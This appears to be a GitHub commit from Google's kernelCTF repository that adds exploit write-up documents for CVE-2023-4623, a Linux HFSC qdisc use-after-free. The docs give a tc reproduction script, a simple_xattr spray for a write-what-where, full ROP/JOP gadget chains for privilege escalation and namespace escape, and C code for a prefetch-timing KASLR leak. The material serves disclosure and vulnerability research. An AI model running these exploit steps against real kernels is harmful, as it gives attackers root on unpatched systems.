Add kernelCTF CVE-2023-4623_lts_cos (#110)

* Add CVE-2023-4623_lts_cos * Remove unnecessary function * Add comments * Fix side-channel reliability * Add docs * Update Makefile * Use seperate KASLR leak * Make requested changes
google · Aug 2, 2024 · 361a3fb · 361a3fb
1 parent 0226d51
commit 361a3fb
Show file tree

Hide file tree

Showing 11 changed files with 1,232 additions and 0 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md
@@ -0,0 +1,184 @@
+## Overview
+
+The vulnerability leads to a use-after-free on an `hfsc_class` object in `hfsc_dequeue()`. By replacing the vulnerable `hfsc_class` with a crafted `simple_xattr`, we can make `hfsc_dequeue()` perform a write-what-where. This is used to overwrite a function pointer in the kernel's `.data` section that is then called to execute a ROP chain and escape the namespace. The kernel base slide, which is needed to determine the write primitive's target address and ROP gadget addresses, is leaked using a prefetch timing side-channel.
+
+## Setup
+
+The exploit enters a network namespace as root in order to get `CAP_NET_ADMIN`:
+
+```
+unshare(CLONE_NEWUSER);
+unshare(CLONE_NEWNET);
+```
+A temporary file is opened to attach attributes to for the `simple_xattr` spray:
+```
+xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
+```
+If the kernel base is not provided, `kaslr_leak()` leaks it using a prefetch side-channel (see final section for details).
+
+## Triggering the Vulnerability
+
+To trigger the vulnerability, we need to set up an HFSC qdisc and send packets to it. We will need to open two types of sockets: an `AF_NETLINK` socket for configuring the qdisc and an `AF_INET` socket for enqueueing packets at the qdisc. The qdisc is set up on `lo` by sending preconstructed messages to the Netlink socket. The `tf_msg` struct is used to represent the Netlink route messages, which are constructed in `init_nl_msgs()`. The following sequence of messages is sent:
+
+- `if_up_msg` sets `lo` up so that packets can be sent to the qdisc.
+- `newqd_msg` attaches an HFSC qdisc to `lo`.
+- `new_rsc_msg` adds a class with an RSC (real-time service curve) to the qdisc as a child of the root class.
+- `new_fsc_msg` adds a class with an FSC (link-sharing service curve) to the qdisc as a child of the RSC class.
+- At this point an `AF_INET` socket is opened and written to with `loopback_send()`. The message will be enqueued in the FSC class, causing the RSC class to be mistakenly added to the root class's `vt_tree`.
+- `delc_msg` deletes the FSC class, then another `delc_msg` deletes the RSC class, leaving a dangling pointer to the underlying `hfsc_class` object in the root class's `vt_tree`.
+
+## Write-What-Where
+
+The use-after-free is reached via [`hfsc_dequeue()`](https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570 "https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570"), which calls `vttree_get_kminvt()`:
+
+```
+static struct hfsc_class *
+vttree_get_minvt(struct hfsc_class *cl, u64 cur_time)
+{
+    /* if root-class's cfmin is bigger than cur_time nothing to do */
+    if (cl->cl_cfmin > cur_time)
+        return NULL;
+
+    while (cl->level > 0) {
+        cl = vttree_firstfit(cl, cur_time);
+        if (cl == NULL)
+            return NULL;
+        /*
+         * update parent's cl_cvtmin.
+         */
+        if (cl->cl_parent->cl_cvtmin < cl->cl_vt)
+            cl->cl_parent->cl_cvtmin = cl->cl_vt;
+    }
+    return cl;
+}
+```
+
+The loop will eventually assign our dangling pointer to `cl`. Then the line
+```
+cl->cl_parent->cl_cvtmin = cl->cl_vt;
+```
+gives us an 8-byte write-what-where primitive with the restriction that the value written is greater than what it is replacing. This primitive will be used to overwrite the `qfq_qdisc_ops.change()` function pointer in the kernel's `.data` section with a JOP gadget. Since the QFQ qdisc does not define a change function, `qfq_qdisc_ops.change()` is initially `NULL` and can be overwritten with any value.
+
+A `simple_xattr` is used to store the target address and value. The exploit uses `spray_simple_xattrs()` to add attributes to a temporary file, which sprays the `kmalloc-1024` cache where the vulnerable `hfsc_class` is located with `simple_xattr` objects.
+
+The `value` field of `simple_xattr` is filled with a fake `hfsc_class`. The following fields have to be faked:
+
+- `cl_parent`: The address to write to minus `offsetof(hfsc_class, cl_cvtmin)`.  Set to the address of `qfq_qdisc_ops.change()`.
+- `cl_vt`: The 8-byte value to write. Set to the address of a JOP gadget.
+- `cl_f`: Set to zero to satisfy the `p->cl_f <= cur_time` condition in `vttree_firstfit()`.
+- `level`: Set to a non-zero value to prevent `vttree_get_minvt()` from returning the dangling pointer and causing further use-after-frees.
+- `vt_node`: This is the red-black tree node that the vulnerable class is accessed through. We make this a black node with `NULL` children to prevent crashes in `init_vf()` and `vttree_get_minvt()`.
+- `vt_node.__rb_parent_color`: Set to 1, coloring the node black.
+- `vt_node.rb_right`: Set to `NULL` so that it is not dereferenced.
+- `vt_node.rb_left`: Set to `NULL` so that it is not dereferenced. 
+- `cf_node`: There is another dangling pointer to the vulnerable class from root class's `cf_tree`. This is filled in the same way as `vt_node` to prevent a crash in `init_vf()` but is not otherwise relevant.
+
+Once a `simple_xattr` has been allocated over the vulnerable `hfsc_class`, another FSC class is created with `new_fsc_msg` so that the qdisc has somewhere to enqueue packets (`hfsc_dequeue()` will return early if the qdisc is empty.) The write-what-where in `hfsc_dequeue()` is then triggered by sending an `AF_INET` packet with the `loopback_send()` helper function.
+
+## ROP Chain
+
+Now that `qfq_qdisc_ops.change()` has been overwritten, it can be called by sending the `new_qfq_qdisc` message to a Netlink socket. The kernel will then call the overwritten pointer from `qdisc_change()` with `rsi` pointing to the middle of sent message. The data around `rsi` is attacker controlled and contains the ROP chain.
+
+The `new_qfq_qdisc` message is constructed with two consecutive `TCA_OPTIONS` attributes, each of which consists of a 4-byte `rtattr` header followed by a data buffer. When the overwritten function is called, `rsi` will point to the second attribute, whose data buffer stores a ROP chain copied from `rop_buf`. The preceding attribute's buffer contains a single gadget, copied from `jop_buf` and found at `rsi - 0x70` when the chain is executed.
+
+The chain starts by calling the JOP gadget stored at `qfq_qdisc_ops.change()`:
+```
+push rsi ; jmp qword ptr [rsi - 0x70]
+```
+The gadget at `rsi - 0x70` then completes the stack pivot to the ROP chain at `rsi + 8` (the offset of `8` is needed to skip the `rtattr` header):
+```
+pop rsp ; pop rbx ; jmp __x86_return_thunk             // rsi - 0x70
+```
+The ROP chain starts by copying `rdi` into `rbx`, which restores `rbx`'s previous value:
+```
+push rdi ; pop rbx ; pop rbp ; jmp __x86_return_thunk  // rsi + 0x8
+0
+```
+This is necessary becuase the chain will eventually return back to the kernel stack and `rbx` is callee saved. After this the usual privilege escalation and namespace escape is performed using `commit_creds()` and `switch_task_namespaces()`:
+```
+pop rdi ; jmp __x86_return_thunk
+0
+prepare_kernel_cred()
+pop rcx ; jmp __x86_return_thunk
+commit_creds()
+mov rdi, rax ; jmp __x86_indirect_thunk_rcx
+pop rdi ; jmp __x86_return_thunk
+1
+find_task_by_vpid()
+pop rsi ; jmp __x86_return_thunk
+init_ns_proxy
+pop rcx ; jmp __x86_return_thunk
+switch_task_namespaces()
+mov rdi, rax ; jmp __x86_indirect_thunk_rcx
+```
+
+The ROP chain ends by pivoting back to the previous frame on the kernel stack. A kernel stack pointer can be read from `r14` on the LTS instance and `r13` on the COS instance. An offset of `-384` or `-368` is added to this pointer to get the location of the target frame on LTS and COS, respectively. Here are the the gadgets for LTS:
+
+```
+mov rax, r14 ; pop r14 ; jmp __x86_return_thunk
+0
+pop rdx ; jmp __x86_return_thunk
+pop r14 ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+pop rcx ; jmp __x86_return_thunk
+-384
+add rax, rcx ; jmp __x86_return_thunk
+pop rdx ; jmp __x86_return_thunk
+pop rsp ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+```
+and COS:
+```
+mov rax, r13 ; pop r13 ; pop rbp ; jmp __x86_return_thunk
+0
+0
+pop rsi ; jmp __x86_return_thunk
+-368
+add rax, rsi ; jmp __x86_return_thunk
+pop rdx ; jmp __x86_return_thunk
+pop rsp ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+```
+## Infoleak with Prefetch Timing Side-channel
+
+A simple implementation the prefetch timing side-channel (described in this [P0 blog post](https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html "https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html") and originally from this [paper](https://gruss.cc/files/prefetch.pdf "https://gruss.cc/files/prefetch.pdf") by Daniel Gruss et al.) is used to bypass KASLR. This side-channel exploits timing differences in `prefetch` instructions based on whether the target address is mapped and the cache state.
+
+Addresses which are mapped and have been recently accessed have a faster prefetch time than unmapped addresses (`prefetch` itself does not count as an access here). We access `sys_getuid()` by calling `getuid()` and then measure prefetch times for all possible locations of `sys_getuid()`. The target instance's kernel base is always located at a `0x1000000` aligned address between `0xffffffff81000000` and `0xffffffffbb000000`, so there are 59 candidate addresses to test.
+
+The attack first finds the minimum prefetch time `min` for the unmapped address `0xffffffff80000000`. Prefetch times for other unmapped addresses will likely be greater than or equal to to `min`, so any address with a faster prefetch time is assumed to be mapped. The lowest mapped address found this way is taken to be the kernel base.
+
+
+
+```
+#define MIN_STEXT 0xffffffff81000000
+#define MAX_STEXT 0xffffffffbb000000 
+#define BASE_INC 0x1000000
+
+long kaslr_leak (int tries1, int tries2) {
+    long base = -1, addr;
+    size_t time;
+    size_t min = -1;
+
+    addr = 0xffffffff80000000;
+    for (int i = 0; i < tries1; i++) {
+        time = onlyreload(addr);
+        min = min < time ? min : time;
+    }
+
+    for (int i = 0; i < tries2; i++) {
+        for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) {
+            time = onlyreload(addr + SYS_GETUID);
+            if (time < min && addr < base) {
+                base = addr;
+            }
+        }
+    }
+    return base;
+}
+```
+
+The prefetch timing assembly code in `onlyreload()` is taken from Daniel Gruss's [repository](https://github.com/IAIK/prefetch "https://github.com/IAIK/prefetch") with `cpuid` replaced by `mfence` as suggested in the P0 blog post.
+
+The original exploit did not preload the target address, but the leak will not work reliably without this on the current server (likely due to increased cache activity).
+
+This implementation of the side-channel works on the Intel Xeon CPU used by the live instance but not the AMD CPU used by the exploit_repro instance, since there is no timing difference between the two cases it tests for on AMD.
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md
@@ -0,0 +1,35 @@
+## Vulnerability Details
+
+There is a use-after-free in the traffic control system's HFSC qdisc when a HFSC class with link-sharing has a parent without link-sharing. When a packet is enqueued at the the child class, `init_vf()` will call `vttree_insert()` on the parent. However, when the packet is dequeued, `vttree_remove()` will be skipped in `update_vf()` since the parent does not have the `HFSC_FSC` flag set. This leaves a dangling pointer which can be exploited to cause a use-after-free and achieve privilege escalation.
+
+The vulnerability has been present since the HFSC qdisc was introduced in kernel version 2.6.3. It was fixed in version 6.5 with commit `b3d26c5702c7 ("net/sched: sch_hfsc: Ensure inner classes have fsc curve")`. This commit made it impossible for classes without link-sharing curves to become parents, since only inner classes with link-sharing curves are meaningful in the HFSC protocol.
+
+Triggering the vulnerability requires `CONFIG_NET_SCH_HFSC` to be enabled in the kernel configuration. The user must have the `CAP_NET_ADMIN` capability to trigger the vulnerability, which can be gained with access to unprivileged user namespaces. Disabling unprivileged user namespaces prevents the vulnerability from being exploited for privilege escalation.
+
+## POC
+```
+# Set lo up
+ip link set lo up
+
+# Create the HFSC qdisc and root class.
+tc qdisc add dev lo parent root handle 1: hfsc def 2
+
+# Add a real-time class as a child of root class.
+tc class add dev lo parent 1: classid 1:1 hfsc rt umax 1 dmax 1 rate 1
+
+# Add a link-sharing class as a child of the real-time class.
+tc class add dev lo parent 1:1 classid 1:2 hfsc ls umax 1 dmax 1 rate 1
+
+# Enqueue packet at link-sharing class, which calls init_vf() on it.
+ping -c1 localhost
+
+# Delete the parent and child classes, leaving a dangling pointer.
+tc class del dev lo classid 1:2
+tc class del dev lo classid 1:1
+
+# Add a link-sharing class to enqueue packets to (if the queue is empty, hfsc_dequeue() will return before reaching the UaF)
+tc class add dev lo parent 1: classid 1:2 hfsc ls umax 1 dmax 1 rate 1
+
+# Trigger use after free in hfsc_dequeue()
+ping -c1 localhost
+```
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile
@@ -0,0 +1,6 @@
+CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static
+
+exploit: exploit.c
+
+run:
+	./exploit
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit